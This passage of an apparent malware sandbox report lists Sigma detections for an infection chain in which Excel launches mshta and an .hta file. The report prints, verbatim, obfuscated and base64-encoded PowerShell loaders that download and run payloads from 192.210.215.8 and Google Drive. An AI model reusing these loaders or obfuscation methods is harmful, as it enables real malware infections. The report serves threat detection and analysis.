lJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmlt
      Sigma detected: File With Uncommon Extension Created By An Office Application
      Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3404, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uwantskillthingstobegreatthingswitheveryonewithuthat[1].hta
      Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
      Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87,
      Sigma detected: Potential PowerShell Command Line Obfuscation
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87,
      Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87,
      Sigma detected: Potentially Suspicious PowerShell Child Processes
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , ProcessId: 4080, ProcessName: wscript.exe
      Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmlt
      Sigma detected: Suspicious MSHTA Child Process
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))", CommandLine: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICA
      Sigma detected: Suspicious Microsoft Office Child Process
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3404, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3688, ProcessName: mshta.exe
      Sigma detected: Suspicious PowerShell Parameter Substring
